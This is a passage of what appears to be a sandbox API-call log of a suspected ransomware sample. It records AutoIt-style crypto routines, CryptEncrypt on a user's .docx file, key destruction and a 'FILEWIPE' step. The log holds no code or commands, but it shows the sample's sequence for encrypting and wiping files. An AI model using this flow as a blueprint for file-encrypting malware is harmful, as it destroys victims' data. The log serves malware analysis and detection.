lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.432] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0177.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.433] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.433] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.433] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.433] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.434] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xd070, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xd080) returned 1 [0177.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.434] CharLowerBuffW (in: lpsz="byte[53377]", cchLength=0xb | out: lpsz="byte[53377]") returned 0xb [0177.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.437] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.437] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6c080*, pdwDataLen=0x87e820*=0xd070, dwBufLen=0xd080 | out: pbData=0xa6c080*, pdwDataLen=0x87e820*=0xd080) returned 1 [0177.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.440] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.440] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.440] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.440] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.440] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.441] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.441] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.451] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.451] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.451] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0177.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.451] CryptDestroyKey (hKey=0x90af18) returned 1 [0177.452] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.452] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.452] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.452] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.452] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.452] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.452] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.452] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.474] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.474] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.474] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.474] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.474] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.475] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.475] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.475] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.475] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0177.475] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.475] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.475] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.475] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.475] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.476] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.479] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.480] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0x90ae18 [0177.481] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.481] CharLowerBuffW (in: lpsz="byte[53360]", cchLength=0xb | out: lpsz="byte[53360]") returned 0xb [0177.482] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.482] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.482] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.482] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.483] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26d8 [0177.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.483] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.483] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.484] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.484] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.485] RtlAllocateHeap 